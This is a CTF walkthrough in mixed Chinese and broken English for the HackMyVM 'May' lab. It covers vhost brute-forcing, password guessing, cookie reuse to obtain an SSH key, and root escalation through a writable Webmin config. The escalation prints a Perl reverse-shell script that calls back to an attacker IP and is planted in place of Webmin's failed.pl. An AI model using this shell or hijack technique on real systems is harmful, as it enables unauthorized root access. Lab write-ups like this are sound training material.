hackmyvm: may walkthrough

信息收集

访问80,Would jump to domain namemay.hmv访问,这里需添加hosts访问.

Got a user Mingmarie.
Blasting directory failed,于是爆破vhost.

找到两个vhost,portal和ssh.添加hosts后访问portal.may.hmv.This a login page,会验证用户名和密码,After a failed attempt to inject,Using the user name password try blasting obtained from the front.

得到密码rebeldeAnd capturing the successcookie,将这个cookie注入到http://ssh.may.hmv/check.php的请求中去,成功获取marie用户的私钥.

获取user flag

To save the private key,And Settings for the current user to read and write only,ssh登录marie.

获取root flag

查看root用户进程,Found the following process.

查看miniserv.conf文件权限,发现marie可以直接编辑,于是在home目录下创建一个failed.pl替换掉默认的.

在failed.plAdd the reboundshell代码.

[email protected]:~$ cat failed.pl 
#!/usr/bin/perl
use Socket;$i="192.168.143.135";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
    open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!";
while(<CONF>) {
    
        $root = $1 if (/^root=(.*)/);
        }
close(CONF);
$root || die "No root= line found in /etc/webmin/miniserv.conf";
$ENV{
    'PERLLIB'} = "$root";
$ENV{
    'WEBMIN_CONFIG'} = "/etc/webmin";
$ENV{
    'WEBMIN_VAR'} = "/var/webmin";
delete($ENV{
    'MINISERV_CONFIG'});
chdir("$root");
exec("$root/record-failed.pl", @ARGV) || die "Failed to run $root/record-failed.pl : $!";

利用sudo重启虚拟机（marie可以无密码执行sudo reboot）.After the restart casuallywebminTo log on to a wrong account can reboundroot.